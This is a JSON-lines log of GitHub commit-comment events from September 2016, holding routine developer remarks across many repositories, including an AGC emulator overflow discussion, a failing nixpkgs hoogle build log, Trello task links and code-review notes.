{"id":"4578985544","type":"CommitCommentEvent","actor":{"login":"thewonderidiot"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19068304,"position":null,"line":null,"path":null,"commit_id":"a644de6322271fd23da23a343b136f3e52c638fc","created_at":"2016-09-18T01:21:55Z","updated_at":"2016-09-18T01:21:55Z","body":"Interesting! Is it perhaps possible that they were expecting the accumulator to always have overflow at that point, so the TS MPAC would skip over the OCT 17? Maybe something further upstream is wrong, causing A to not contain overflow."}},"created_at":"2016-09-18T01:21:55Z"}
{"id":"4578991042","type":"CommitCommentEvent","actor":{"login":"Made123"},"repo":{"name":"MangoScango/PokemonGo-Map"},"payload":{"comment":{"id":19068316,"position":null,"line":null,"path":null,"commit_id":"673cc30f83a54369e42df272efafd02eb2a8515f","created_at":"2016-09-18T01:26:37Z","updated_at":"2016-09-18T01:26:37Z","body":"is there a way to merge scan pokemon lure and get their IV&Move branch to this one ?"}},"created_at":"2016-09-18T01:26:37Z"}
{"id":"4578993713","type":"CommitCommentEvent","actor":{"login":"ampersand86"},"repo":{"name":"ampersand86/Exam-2-Program"},"payload":{"comment":{"id":19068323,"position":null,"line":null,"path":null,"commit_id":"86d3745703e5361b7f49eb6b0c6775ee4b529e24","created_at":"2016-09-18T01:28:59Z","updated_at":"2016-09-18T01:28:59Z","body":"test"}},"created_at":"2016-09-18T01:28:59Z"}
{"id":"4578997859","type":"CommitCommentEvent","actor":{"login":"forrestfiller"},"repo":{"name":"forrestfiller/jns"},"payload":{"comment":{"id":19068336,"position":null,"line":null,"path":null,"commit_id":"e600474fd713e30cf140b2c49b44c673629326df","created_at":"2016-09-18T01:32:26Z","updated_at":"2016-09-18T01:32:26Z","body":"@kleinee not yet! Have you tried it? It took a few hours to install, however I'm struggling to be able to access the jns from another computer. I'll let you know when i figure it out. Good luck!"}},"created_at":"2016-09-18T01:32:26Z"}
{"id":"4579000702","type":"CommitCommentEvent","actor":{"login":"sea51930"},"repo":{"name":"bitpay/copay"},"payload":{"comment":{"id":19068342,"position":null,"line":null,"path":null,"commit_id":"78e80e9dfa0e0e2e1886ae3a0f1fb065ff7e8e24","created_at":"2016-09-18T01:34:56Z","updated_at":"2016-09-18T01:34:56Z","body":"Comment on 78e80e9"}},"created_at":"2016-09-18T01:34:56Z"}
{"id":"4579001017","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19068343,"position":null,"line":null,"path":null,"commit_id":"af1d6e503ef6d6ad052979d37486076f71dfcf0b","created_at":"2016-09-18T01:35:14Z","updated_at":"2016-09-18T01:35:14Z","body":"Hi @peti: I think this commit broke `hoogle` 4 support.  This is the output I get, from a build that works with the parent of this commit:\r\n\r\n```\r\nPreprocessing test suite 'hoogle-test' for hoogle-4.2.43...\r\n[1 of 1] Compiling Main             ( src/Test.hs, dist/build/hoogle-test/hoogle-test-tmp/Main.o )\r\nLinking dist/build/hoogle-test/hoogle-test ...\r\nrunning tests\r\nRunning 1 test suites...\r\nTest suite hoogle-test: RUNNING...\r\nDownloading downloads/platform.cabal\r\nWARNING: Could not find command line program wget.\r\nWARNING: Could not find command line program curl.\r\nhoogle: Error when running Shake build system:\r\n* default.hoo\r\n* platform.hoo\r\n* platform.txt\r\n* downloads/platform.cabal.cache\r\n* downloads/platform.cabal\r\nCould not find downloader, neither curl nor wget are on the $PATH.\r\nCallStack (from HasCallStack):\r\n  error, called at src/Recipe/Command.hs:51:27 in main:Recipe.Command\r\n\r\nhoogle-test: Command: dist/build/hoogle/hoogle data\r\nFailed with: ExitFailure 1\r\nCallStack (from HasCallStack):\r\n  error, called at src/Test.hs:22:18 in main:Main\r\nTest suite hoogle-test: FAIL\r\nTest suite logged to: dist/test/hoogle-4.2.43-hoogle-test.log\r\n0 of 1 test suites (0 of 1 test cases) passed.\r\nbuilder for ‘/nix/store/3fgvzhpbgi6kqhgahyg5ixl8a6zv709w-hoogle-4.2.43.drv’ failed with exit code 1\r\ncannot build derivation ‘/nix/store/3bfg2sfg0lg555707pc0mg631998hklp-build.sh.drv’: 1 dependencies couldn't be built\r\nerror: build of ‘/nix/store/3bfg2sfg0lg555707pc0mg631998hklp-build.sh.drv’ failed\r\n```"}},"created_at":"2016-09-18T01:35:14Z"}
{"id":"4579001568","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19068345,"position":null,"line":null,"path":null,"commit_id":"af1d6e503ef6d6ad052979d37486076f71dfcf0b","created_at":"2016-09-18T01:35:43Z","updated_at":"2016-09-18T01:35:43Z","body":"I haven't bisected this, so it could be a later commit than yours which caused this, but I was hoping you might recognize the nature of the fault."}},"created_at":"2016-09-18T01:35:43Z"}
{"id":"4579002989","type":"CommitCommentEvent","actor":{"login":"sea51930"},"repo":{"name":"cmgustavo/copay"},"payload":{"comment":{"id":19068348,"position":null,"line":null,"path":null,"commit_id":"7981cccc9109eaa6d101c126ff9516fc9dff8db7","created_at":"2016-09-18T01:37:00Z","updated_at":"2016-09-18T01:37:00Z","body":"Comment on 7981ccc"}},"created_at":"2016-09-18T01:37:00Z"}
{"id":"4579003849","type":"CommitCommentEvent","actor":{"login":"leeleslie7"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19068350,"position":9,"line":9,"path":"shishuo/line-monitoring-map.js","commit_id":"10e74a705b7aff8eda20a018ac621a6f6de22964","created_at":"2016-09-18T01:37:50Z","updated_at":"2016-09-18T01:37:50Z","body":"传递进来的参数无效吧"}},"created_at":"2016-09-18T01:37:50Z"}
{"id":"4579003895","type":"CommitCommentEvent","actor":{"login":"APOPHIS9283"},"repo":{"name":"neobuddy89/shamu"},"payload":{"comment":{"id":19068351,"position":null,"line":null,"path":null,"commit_id":"8bf5c79b7e9c05e7903ead130d13bc6ccf308df4","created_at":"2016-09-18T01:37:52Z","updated_at":"2016-09-18T01:37:52Z","body":"Do you get redefinition errors when compiling? "}},"created_at":"2016-09-18T01:37:52Z"}
{"id":"4579007835","type":"CommitCommentEvent","actor":{"login":"BoubonicNugz"},"repo":{"name":"confuzzledduck/syndicate-out"},"payload":{"comment":{"id":19068368,"position":4,"line":78,"path":"so-options.php","commit_id":"1736a80688244637d7439e09458d53656a1bc6a5","created_at":"2016-09-18T01:41:22Z","updated_at":"2016-09-18T01:41:22Z","body":"There's a bug here - should be:\r\n<option value=\"allbut\r\n\r\nTested/verified - Hope is well :)"}},"created_at":"2016-09-18T01:41:22Z"}
{"id":"4579008750","type":"CommitCommentEvent","actor":{"login":"xXAndrew28Xx"},"repo":{"name":"cyriltasse/SkyModel"},"payload":{"comment":{"id":19068372,"position":null,"line":null,"path":null,"commit_id":"18cadff7b541b7ab068fefaa611b58be50c56cc3","created_at":"2016-09-18T01:42:08Z","updated_at":"2016-09-18T01:42:08Z","body":"It's ok."}},"created_at":"2016-09-18T01:42:08Z"}
{"id":"4579012522","type":"CommitCommentEvent","actor":{"login":"jcrwchinchillas"},"repo":{"name":"jcrwchinchillas/jcrwchinchillas.github.io"},"payload":{"comment":{"id":19068386,"position":null,"line":null,"path":null,"commit_id":"034c2fb12a5d21d9fa4f72b60807028dc21918c2","created_at":"2016-09-18T01:45:22Z","updated_at":"2016-09-18T01:45:22Z","body":"CNAME init"}},"created_at":"2016-09-18T01:45:22Z"}
{"id":"4579013900","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068395,"position":null,"line":null,"path":null,"commit_id":"dddb058f8fb1c44170ba5f1bb76e62386444c2a7","created_at":"2016-09-18T01:46:36Z","updated_at":"2016-09-18T01:46:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;dWwrEO9X&#x2F;11-in-game-tilemap-editor\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> In-game Tilemap editor</a>"}},"created_at":"2016-09-18T01:46:36Z"}
{"id":"4579014681","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068400,"position":null,"line":null,"path":null,"commit_id":"8b654a88f99f53059b1e98ec3e025fcf6e69532b","created_at":"2016-09-18T01:47:16Z","updated_at":"2016-09-18T01:47:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;jpzXWpEU&#x2F;84-refactor-scene-and-game-class-to-be-more-unified\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Refactor scene and game class to be more unified</a>"}},"created_at":"2016-09-18T01:47:16Z"}
{"id":"4579016281","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068406,"position":null,"line":null,"path":null,"commit_id":"82ba2ad7c3df1d099ad174ccb9a70a18492c96f8","created_at":"2016-09-18T01:48:33Z","updated_at":"2016-09-18T01:48:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;iMez5RaJ&#x2F;69-tilemap\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Tilemap</a>"}},"created_at":"2016-09-18T01:48:33Z"}
{"id":"4579017061","type":"CommitCommentEvent","actor":{"login":"hldai"},"repo":{"name":"hldai/entity-linking-with-cnn"},"payload":{"comment":{"id":19068407,"position":null,"line":null,"path":null,"commit_id":"08a56e324204a575e33ee1e8ae0f5d6d60e75f4b","created_at":"2016-09-18T01:49:13Z","updated_at":"2016-09-18T01:49:13Z","body":"@bingo20145 你好，有问题的话可以发email问我，hldai@outlook.com"}},"created_at":"2016-09-18T01:49:13Z"}
{"id":"4579017293","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068408,"position":null,"line":null,"path":null,"commit_id":"9d98ecf5971e8e4a06d38079ca5688dce79a34cc","created_at":"2016-09-18T01:49:22Z","updated_at":"2016-09-18T01:49:22Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;nBuZsmGQ&#x2F;9-sound-fx\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Sound FX</a>"}},"created_at":"2016-09-18T01:49:22Z"}
{"id":"4579018066","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068411,"position":null,"line":null,"path":null,"commit_id":"f3bf70f4eace35ee0ebb5da320d97a8802c401fe","created_at":"2016-09-18T01:50:03Z","updated_at":"2016-09-18T01:50:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;q5b3wJ1F&#x2F;5-animated-tiles\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Animated tiles</a>"}},"created_at":"2016-09-18T01:50:03Z"}
{"id":"4579019116","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19068415,"position":null,"line":null,"path":null,"commit_id":"ba96753bf421b7fe4e06cd9a6cef622e21b35f27","created_at":"2016-09-18T01:50:51Z","updated_at":"2016-09-18T01:50:51Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;q5b3wJ1F&#x2F;5-animated-tiles\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Animated tiles</a>"}},"created_at":"2016-09-18T01:50:51Z"}
{"id":"4579019376","type":"CommitCommentEvent","actor":{"login":"xweizhi"},"repo":{"name":"xweizhi/SoLIDTracking"},"payload":{"comment":{"id":19068417,"position":null,"line":null,"path":null,"commit_id":"c16c12f583a60bf661d1ed2d197e255e18b582e5","created_at":"2016-09-18T01:51:07Z","updated_at":"2016-09-18T01:51:07Z","body":"Change the calorimeter hit output method. Made changes for double particle tracking. Bug fixed when SoLKalTrackFinder CheckTrigger function"}},"created_at":"2016-09-18T01:51:07Z"}
{"id":"4579019631","type":"CommitCommentEvent","actor":{"login":"bingo20145"},"repo":{"name":"hldai/entity-linking-with-cnn"},"payload":{"comment":{"id":19068418,"position":null,"line":null,"path":null,"commit_id":"08a56e324204a575e33ee1e8ae0f5d6d60e75f4b","created_at":"2016-09-18T01:51:18Z","updated_at":"2016-09-18T01:51:18Z","body":"@好的，谢谢！"}},"created_at":"2016-09-18T01:51:18Z"}
{"id":"4579021904","type":"CommitCommentEvent","actor":{"login":"HeVictor"},"repo":{"name":"HeVictor/VOXSPELL-Prototype"},"payload":{"comment":{"id":19068426,"position":null,"line":null,"path":null,"commit_id":"cbf0442112dda10de35362981b8dbfb24792dfe9","created_at":"2016-09-18T01:53:16Z","updated_at":"2016-09-18T01:53:16Z","body":"I also added the icon imgs and jar required for the media player to run properly."}},"created_at":"2016-09-18T01:53:16Z"}
{"id":"4579022343","type":"CommitCommentEvent","actor":{"login":"thewonderidiot"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19068429,"position":null,"line":null,"path":null,"commit_id":"a644de6322271fd23da23a343b136f3e52c638fc","created_at":"2016-09-18T01:53:37Z","updated_at":"2016-09-18T01:53:37Z","body":"There's a possible related thing here: https://github.com/rburkey2005/virtualagc/blob/block1/yaAGCb1/executeOneInstruction.c#L399\r\n\r\nDoesn't the \"0 & \" mean that the positive branch will never be taken? And shouldn't it be looking at A's overflow, not the fetched operand?"}},"created_at":"2016-09-18T01:53:37Z"}
{"id":"4579026360","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19068436,"position":20,"line":94,"path":"lilac","commit_id":"02ab182693a8de97419366b8ffb328c1792432ff","created_at":"2016-09-18T01:56:49Z","updated_at":"2016-09-18T01:56:49Z","body":"@petronny 你是不是根本没测试过啊？这个逻辑反了。还有，你没有调用 `.connect` 方法。"}},"created_at":"2016-09-18T01:56:49Z"}
{"id":"4579646242","type":"CommitCommentEvent","actor":{"login":"floam"},"repo":{"name":"fish-shell/fish-shell"},"payload":{"comment":{"id":19070134,"position":73,"line":217,"path":"configure.ac","commit_id":"06c658dd5e8d331badd0589274e061b28e1eaac8","created_at":"2016-09-18T10:00:15Z","updated_at":"2016-09-18T10:00:15Z","body":"I left the most notable change on the cutting room floor of the git commit - I finally have added Wextra as discussed on GItter when @krader's noticed me running with more flags on than the project defaults. \r\n\r\nThis makes our build noisy again - we'll see if we like a squeaky wheel.\r\n\r\nI removed `-Wno-sign-compare` because it was present but actually it was suppressing 0 warnings on m system. "}},"created_at":"2016-09-18T10:00:15Z"}
{"id":"4579646635","type":"CommitCommentEvent","actor":{"login":"Alexander-Hjelm"},"repo":{"name":"medik/Mat"},"payload":{"comment":{"id":19070135,"position":null,"line":null,"path":null,"commit_id":"e78512c4fcf17d55d29d9df35ba4921ba1008078","created_at":"2016-09-18T10:00:27Z","updated_at":"2016-09-18T10:00:27Z","body":"Alltså jag lämnade den raden där för att undvika klagomål"}},"created_at":"2016-09-18T10:00:27Z"}
{"id":"4579646661","type":"CommitCommentEvent","actor":{"login":"guanfrank"},"repo":{"name":"guanfrank/ExData_Plotting1"},"payload":{"comment":{"id":19070136,"position":null,"line":null,"path":null,"commit_id":"f503937d98c0c390f3b10352f13c1f53e6e4c910","created_at":"2016-09-18T10:00:28Z","updated_at":"2016-09-18T10:00:28Z","body":"commit again"}},"created_at":"2016-09-18T10:00:28Z"}
{"id":"4579647088","type":"CommitCommentEvent","actor":{"login":"xarilo"},"repo":{"name":"xarilo/Entrega-1-polimorfismo"},"payload":{"comment":{"id":19070141,"position":null,"line":null,"path":null,"commit_id":"6bbf639df2d45ff14dfc996eaaa0aa730c2daac2","created_at":"2016-09-18T10:00:44Z","updated_at":"2016-09-18T10:00:44Z","body":"Clase rectangulo, empezando"}},"created_at":"2016-09-18T10:00:44Z"}
{"id":"4579652860","type":"CommitCommentEvent","actor":{"login":"AugustDay"},"repo":{"name":"AugustDay/CellularAutomata"},"payload":{"comment":{"id":19070153,"position":null,"line":null,"path":null,"commit_id":"b732ba76a7584f4b9d9118ef2d0254de04ef06cf","created_at":"2016-09-18T10:03:56Z","updated_at":"2016-09-18T10:03:56Z","body":"This commit implements #3 and hopefully fixes #8 ."}},"created_at":"2016-09-18T10:03:56Z"}
{"id":"4579654219","type":"CommitCommentEvent","actor":{"login":"hintjens"},"repo":{"name":"booksbyus/zguide"},"payload":{"comment":{"id":19070154,"position":134,"line":190,"path":"examples/C/kvmsg.c","commit_id":"fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed","created_at":"2016-09-18T10:04:56Z","updated_at":"2016-09-18T10:04:56Z","body":"Yes, using the v3 CZMQ API is a great idea IMO.\n\nOn Sun, Sep 18, 2016 at 11:36 AM, Patrik Wenger <notifications@github.com>\nwrote:\n\n> I still feel inexperienced in C, but I can try.\n>\n> And I'm sorry to hear about that. I could but I haven't even read 100% of\n> it. If it's about accepting PRs, and maybe eventually adapting it for the\n> more recent CZMQ API (like zactor instead of zthread), then sure.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/booksbyus/zguide/commit/fd16d5e466e1ce3a9d1f2eca13293ba6dddcabed#commitcomment-19070072>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AASzCFPXfE_Ercgf3nOQzyJ32GeP46qrks5qrQYZgaJpZM4J_sVY>\n> .\n>\n"}},"created_at":"2016-09-18T10:04:56Z"}
{"id":"4579655376","type":"CommitCommentEvent","actor":{"login":"jeroensak"},"repo":{"name":"jeroensak/devdays16"},"payload":{"comment":{"id":19070157,"position":null,"line":null,"path":null,"commit_id":"654c194ddb71a132de89834cfcf138acfec880c7","created_at":"2016-09-18T10:05:46Z","updated_at":"2016-09-18T10:05:46Z","body":"Hehe oeps\r\n\r\nOp 18 sep. 2016 om 12:01 heeft Kevin Boosten <notifications@github.com<mailto:notifications@github.com>> het volgende geschreven:\r\n\r\n\r\n@jeroensak<https://github.com/jeroensak> je hebt per ongeluk ook de config.xml verwijderd ;) Ik zal hem terugzetten in mijn volgende pull request\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub<https://github.com/jeroensak/devdays16/commit/654c194ddb71a132de89834cfcf138acfec880c7#commitcomment-19070147>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AIgzCsUk1ToNWGw3JCnaBRqddIMzKUA_ks5qrQvpgaJpZM4J_3Eo>.\r\n"}},"created_at":"2016-09-18T10:05:46Z"}
{"id":"4579655737","type":"CommitCommentEvent","actor":{"login":"heidrek"},"repo":{"name":"gizur/trailerapp-common"},"payload":{"comment":{"id":19070159,"position":29,"line":29,"path":"util/ServiceHelper.js","commit_id":"3a785e3c709953355ab0c6e89796b52f8eba58e6","created_at":"2016-09-18T10:06:01Z","updated_at":"2016-09-18T10:06:01Z","body":"returning the promise @gizur-prabhat "}},"created_at":"2016-09-18T10:06:01Z"}
{"id":"4579656021","type":"CommitCommentEvent","actor":{"login":"heidrek"},"repo":{"name":"gizur/trailerapp-common"},"payload":{"comment":{"id":19070162,"position":44,"line":44,"path":"util/ServiceHelper.js","commit_id":"3a785e3c709953355ab0c6e89796b52f8eba58e6","created_at":"2016-09-18T10:06:15Z","updated_at":"2016-09-18T10:06:15Z","body":"returning the promise @gizur-prabhat "}},"created_at":"2016-09-18T10:06:15Z"}
{"id":"4579656349","type":"CommitCommentEvent","actor":{"login":"heidrek"},"repo":{"name":"gizur/trailerapp-common"},"payload":{"comment":{"id":19070163,"position":6,"line":28,"path":"model/HomeModel.js","commit_id":"3a785e3c709953355ab0c6e89796b52f8eba58e6","created_at":"2016-09-18T10:06:29Z","updated_at":"2016-09-18T10:06:29Z","body":"returning the promise @gizur-prabhat "}},"created_at":"2016-09-18T10:06:29Z"}
{"id":"4579659961","type":"CommitCommentEvent","actor":{"login":"mfalt"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19070168,"position":null,"line":null,"path":null,"commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-18T10:09:14Z","updated_at":"2016-09-18T10:09:14Z","body":"This looks great! I think choosing to supply a separate `y` input is the right way to go. I am still not convinced that it is smart to calculate the prox value in the prox too, but maybe it is.\r\nRegarding the `@inblunds`, I think that we could simply start by checking that the lengths of both inputs are the same. I assume that these functions will eventually be run on slices of the inputs (for example in the cone case where we have different cones for different parts of `x`) so we should verify that it works for that case too.\r\nOne thing that should probably be changed however is that x and y should be the same type. For example:\r\n```julia\r\nfunction prox!(f::SqrDistL2, x::RealOrComplexArray, gamma::Float64, y::RealOrComplexArray)\r\n```\r\nshould probably be\r\n```julia\r\nfunction prox!{T<:RealOrComplexArray}(f::SqrDistL2, x::T, gamma::Float64, y::T)\r\n```"}},"created_at":"2016-09-18T10:09:14Z"}
{"id":"4579660593","type":"CommitCommentEvent","actor":{"login":"aaugustin"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19070169,"position":29,"line":405,"path":"django/core/urlresolvers.py","commit_id":"31b5275235bac150a54059db0288a19b9e0516c7","created_at":"2016-09-18T10:09:34Z","updated_at":"2016-09-18T10:09:34Z","body":"The best way to know how WSGI works is to test with a plain WSGI app what gunicorn, mod_wsgi and uwsgi do. They may or may not do the same thing, which may or may not be what PEP 3333 says :-/\r\n\r\nThen you can add Django to the mix and see if it does something incorrect."}},"created_at":"2016-09-18T10:09:34Z"}
{"id":"4579662680","type":"CommitCommentEvent","actor":{"login":"mfalt"},"repo":{"name":"kul-forbes/Prox.jl"},"payload":{"comment":{"id":19070171,"position":24,"line":48,"path":"src/functions/normL1.jl","commit_id":"a7e6248dbe59978fb983fa532a7b29520f142c49","created_at":"2016-09-18T10:11:01Z","updated_at":"2016-09-18T10:11:01Z","body":"Is the `sign` really what we want here? (I actually don't know), it has the behavior `sign(x):=x/abs(x)` even for complex `x`."}},"created_at":"2016-09-18T10:11:01Z"}
{"id":"4579665991","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"Roboe/android_kernel_fairphone_fp2"},"payload":{"comment":{"id":19070173,"position":null,"line":null,"path":null,"commit_id":"f2a065870b15fab208a5b5e36272ea29b1d63712","created_at":"2016-09-18T10:13:36Z","updated_at":"2016-09-18T10:13:36Z","body":"Question: Is this also a fix: https://github.com/FairphoneMirrors/android_kernel_fairphone_fp2/commit/bc38a196609e76a611d698211c7bd9f79bebda5b (from the official repo)?"}},"created_at":"2016-09-18T10:13:36Z"}
{"id":"4579666095","type":"CommitCommentEvent","actor":{"login":"jrevels"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19070174,"position":null,"line":null,"path":null,"commit_id":"45bc17d41b40f271dd5ebb2357e7f3564f969007","created_at":"2016-09-18T10:13:40Z","updated_at":"2016-09-18T10:13:40Z","body":"I'm not sure why, but Nanosoldier didn't seem to receive the job it submitted to itself here. Let's try again:\r\n\r\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`"}},"created_at":"2016-09-18T10:13:40Z"}
{"id":"4579666709","type":"CommitCommentEvent","actor":{"login":"bobjohnbobjohn"},"repo":{"name":"gonzoid/picroscope"},"payload":{"comment":{"id":19070175,"position":3,"line":3,"path":"run_test.sh","commit_id":"131044e8315d3cd7bc770b46f63fa5f64566973b","created_at":"2016-09-18T10:14:07Z","updated_at":"2016-09-18T10:14:07Z","body":"it should be `PYTHONPATH=. py.test` from this location,\r\nindeed if you only use `PYTHONPATH=.. py.test` it should not work, so this means that you have '.' in your default PYTHONPATH."}},"created_at":"2016-09-18T10:14:07Z"}
{"id":"4579666920","type":"CommitCommentEvent","actor":{"login":"MorbusM59"},"repo":{"name":"cyberjunk/meridian59-dotnet"},"payload":{"comment":{"id":19070176,"position":null,"line":null,"path":null,"commit_id":"9e27b118b547151af4f11f72bcf6dc6c4fa700cb","created_at":"2016-09-18T10:14:13Z","updated_at":"2016-09-18T10:14:13Z","body":"Thanks and sorry! :)"}},"created_at":"2016-09-18T10:14:13Z"}
{"id":"4579670190","type":"CommitCommentEvent","actor":{"login":"jrevels"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19070185,"position":null,"line":null,"path":null,"commit_id":"45bc17d41b40f271dd5ebb2357e7f3564f969007","created_at":"2016-09-18T10:16:34Z","updated_at":"2016-09-18T10:16:34Z","body":"Didn't receive it that time either, but there's nothing weird that I can see from the server logs...hmmm. I've restarted the server, hopefully it will work:\r\n\r\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`"}},"created_at":"2016-09-18T10:16:34Z"}
{"id":"4579673962","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"tcanabrava/atcore"},"payload":{"comment":{"id":19070190,"position":15,"line":55,"path":"src/atcore.cpp","commit_id":"d3e05138d52509bd9e6d3a1b3a962589ccc7541b","created_at":"2016-09-18T10:19:09Z","updated_at":"2016-09-18T10:19:09Z","body":"If all ifs fail, no \"if\" will exist and \"else\" will not make sense, GCC will fail to compile it."}},"created_at":"2016-09-18T10:19:09Z"}
{"id":"4579676789","type":"CommitCommentEvent","actor":{"login":"grixa"},"repo":{"name":"grixa/CTFO_BE"},"payload":{"comment":{"id":19070192,"position":198,"line":398,"path":"crunchers/test.cc","commit_id":"ea6f12a3a3498b8504ee7f2afb0914ea93d8e9fe","created_at":"2016-09-18T10:21:11Z","updated_at":"2016-09-18T10:21:11Z","body":"Sorry, I think it's something historical or just a copy-paste :)"}},"created_at":"2016-09-18T10:21:11Z"}
{"id":"4579678636","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"sithlord48/atcore"},"payload":{"comment":{"id":19070195,"position":16,"line":14,"path":"README.md","commit_id":"b28b1e383169f3fc409dd57907c571385fbab18a","created_at":"2016-09-18T10:22:39Z","updated_at":"2016-09-18T10:22:39Z","body":"While it's connected make more sense to me"}},"created_at":"2016-09-18T10:22:39Z"}
{"id":"4579678946","type":"CommitCommentEvent","actor":{"login":"hailinchen"},"repo":{"name":"hailinchen/how-to-become-a-qualified-front-end-engineer"},"payload":{"comment":{"id":19070196,"position":1,"line":1,"path":"README.md","commit_id":"e56e8fffc9328983ab99c858da85f0da8e798c4a","created_at":"2016-09-18T10:22:53Z","updated_at":"2016-09-18T10:22:53Z","body":"how to become a qualified front end engineer"}},"created_at":"2016-09-18T10:22:53Z"}
{"id":"4579679724","type":"CommitCommentEvent","actor":{"login":"Joe-Hill"},"repo":{"name":"CoderMJLee/MJRefresh"},"payload":{"comment":{"id":19070197,"position":10,"line":146,"path":"MJRefresh/Base/MJRefreshHeader.m","commit_id":"ada9e248aea75532eb95271279b933f3a2490369","created_at":"2016-09-18T10:23:27Z","updated_at":"2016-09-18T10:23:27Z","body":"取消 0.1 s 延迟之后，在 iOS 8，iOS 9 的 UICollectionView 中，刷新会出现闪烁。"}},"created_at":"2016-09-18T10:23:27Z"}
{"id":"4579680220","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"sithlord48/atcore"},"payload":{"comment":{"id":19070198,"position":20,"line":18,"path":"README.md","commit_id":"b28b1e383169f3fc409dd57907c571385fbab18a","created_at":"2016-09-18T10:23:52Z","updated_at":"2016-09-18T10:23:52Z","body":"."}},"created_at":"2016-09-18T10:23:52Z"}
{"id":"4579680379","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"sithlord48/atcore"},"payload":{"comment":{"id":19070199,"position":22,"line":20,"path":"README.md","commit_id":"b28b1e383169f3fc409dd57907c571385fbab18a","created_at":"2016-09-18T10:24:00Z","updated_at":"2016-09-18T10:24:00Z","body":"."}},"created_at":"2016-09-18T10:24:00Z"}
{"id":"4579681549","type":"CommitCommentEvent","actor":{"login":"patrickelectric"},"repo":{"name":"sithlord48/atcore"},"payload":{"comment":{"id":19070201,"position":null,"line":null,"path":null,"commit_id":"b28b1e383169f3fc409dd57907c571385fbab18a","created_at":"2016-09-18T10:24:52Z","updated_at":"2016-09-18T10:24:52Z","body":"It's better to add #kde-atelier channel "}},"created_at":"2016-09-18T10:24:52Z"}
{"id":"4579681971","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"Roboe/android_kernel_fairphone_fp2"},"payload":{"comment":{"id":19070202,"position":null,"line":null,"path":null,"commit_id":"f2a065870b15fab208a5b5e36272ea29b1d63712","created_at":"2016-09-18T10:25:12Z","updated_at":"2016-09-18T10:25:12Z","body":"A less orthodox one, but solves the same compiler issue. I specially like the \"DO NOT MERGE\" commit message prefix (joking, 😂)"}},"created_at":"2016-09-18T10:25:12Z"}
{"id":"4579682352","type":"CommitCommentEvent","actor":{"login":"LuRsT"},"repo":{"name":"2degrees/djeneralize"},"payload":{"comment":{"id":19070204,"position":null,"line":null,"path":null,"commit_id":"4989f81a9de5f78afb0465a636b46efbbe0c0592","created_at":"2016-09-18T10:25:28Z","updated_at":"2016-09-18T10:25:28Z","body":"I lol'd @euangoddard :D"}},"created_at":"2016-09-18T10:25:28Z"}
